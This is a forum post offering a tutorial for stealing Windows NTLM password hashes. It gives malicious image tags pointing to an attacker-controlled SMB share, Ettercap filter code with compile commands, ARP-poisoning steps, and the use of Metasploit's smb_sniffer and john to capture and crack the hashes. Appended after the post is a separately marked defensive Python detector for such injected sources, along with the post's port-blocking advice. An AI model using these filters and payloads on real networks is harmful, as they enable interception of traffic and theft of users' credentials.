interesting filter idea, I think I'll give it a try tomorrow, just to test and play around.
Prerequisites:
the victim is browsing the web from Windows with Mozilla (and family) version <2.0.0.6, or I.E. (any version to my knowledge)
How it works:
send the victim malicious html containing a netbios share location
the victim's computer will attempt to login to the attacker's machine, which is running a fake samba server, set up only to capture the login information from the victim
the html code would be
I.E.:
<img src="\\192.168.1.100\share\picture.png">
or
Mozilla:
<img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png">
NOTE: doesn't have to be a real file that's being hosted
ettercap filters replacing google image for that code works nicely
or
# googlbios.ie.filter
# replaces http strings transparently, compile with etterfilter
if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "\\192.168.1.100\share\picture.png");
    msg("Replaced\n");
}
respectively
# googlbios.moz.filter
# replaces http strings transparently, compile with etterfilter
if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "moz-icon:file:///%5c/192.168.1.100/share/picture.png");
    msg("Replaced\n");
}
compile like so (one compiled .ef per filter file)
etterfilter googlbios.ie.filter -o googlbios.ie.ef
etterfilter googlbios.moz.filter -o googlbios.moz.ef
(I use ettercap filters a lot for remote code testing, really handy without causing much out of the ordinary in web browsing; instead of the google image you could use some small image on a popular web page)
run ettercap, unified sniffing, scan for hosts, arp poisoning, etc..
NOTE: after done manipulating the packets on the network be sure to STOP arp poisoning, and STOP sniffing otherwise you'll DoS the lan
NOTE1: netsed is a "cleaner" alternative to ettercap in this case, you have to look up html escape codes for / and .
on the attacker's computer they would be running smb_sniffer from metasploit, which'll send you the password hash
crack with john, and tada
works on all versions of Windows (patched and otherwise), I haven't personally tested it on vista, but I'm told it works the same
Prevention: run a firewall blocking 137-139, 445
Netbios is the biggest security hole in Windows. Disabling its functionality is generally a smart move.
Jake
More nifty tuts for patched machines coming soon....
maybe I'll stop being such a lazy ass and make a video...
where I got the idea:
hxxp://packetstorm.offensive-security.com/papers/attack/tactical_paper.pdf
hxxp://irongeek.com/i.php?page=security/ettercapfilter
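Added example, not part of the post above or its author's tooling: a small Python checker a defender can run over HTTP response bodies (from a proxy, IDS capture or web log) to flag the kind of injected image sources the post describes. It recognises UNC paths (`\\host\share\...`) and `file:` / `moz-icon:file:` URLs whose authority is a remote host, which are what make a Windows browser open an outbound SMB connection and send NTLM credentials. The function names and the sample HTML bodies are my own constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample response bodies (not taken from the post): one benign page
# and two carrying the UNC / moz-icon image sources the post describes.
SAMPLE_BODIES = {
    "benign": '<html><body><img src="/intl/en_ALL/images/logo.gif"></body></html>',
    "ie_unc": '<html><body><img src="\\\\192.168.1.100\\share\\picture.png"></body></html>',
    "moz_icon": '<html><body><img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png"></body></html>',
}


def classify_source(src):
    """Return a reason string if ``src`` would make a Windows browser contact a
    remote host over SMB (and so leak NTLM credentials), otherwise None."""
    s = unquote(src.strip())            # undo %5c-style encoding first
    if s.startswith("\\\\"):            # raw UNC path: \\host\share\file
        return "unc-path"
    lowered = s.lower()
    prefix = "file-url"
    if lowered.startswith("moz-icon:"):  # Mozilla icon wrapper around a file: URL
        lowered = lowered[len("moz-icon:"):]
        prefix = "moz-icon-file"
    if not lowered.startswith("file:"):
        return None
    # Normalise backslashes so file:///\/host/... and file:////host/... look alike,
    # then count the leading slashes: file://host/... (2) and file:////host/... (4+)
    # name a remote host, while file:///c:/... (3) is a local drive.
    rest = lowered[len("file:"):].replace("\\", "/")
    stripped = rest.lstrip("/")
    nslashes = len(rest) - len(stripped)
    host = stripped.split("/", 1)[0]
    if host and host != "localhost" and (nslashes == 2 or nslashes >= 4):
        return prefix
    return None


class _SrcCollector(HTMLParser):
    """Collect every attribute value that the browser would fetch as a resource."""
    ATTRS = {"src", "href", "data", "background", "poster"}

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in self.ATTRS and value:
                self.sources.append((tag, value))


def find_smb_auth_triggers(html):
    """Return [(tag, src, reason)] for each resource reference in ``html`` that
    would trigger an outbound SMB connection from a Windows browser."""
    parser = _SrcCollector()
    parser.feed(html)
    hits = []
    for tag, src in parser.sources:
        reason = classify_source(src)
        if reason:
            hits.append((tag, src, reason))
    return hits


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, "->", find_smb_auth_triggers(body) or "clean")
```

Any hit is worth an alert on its own; the network-side counterpart is the prevention the post already names, blocking outbound 137-139 and 445 at the perimeter so the browser's SMB attempt never reaches the sniffer.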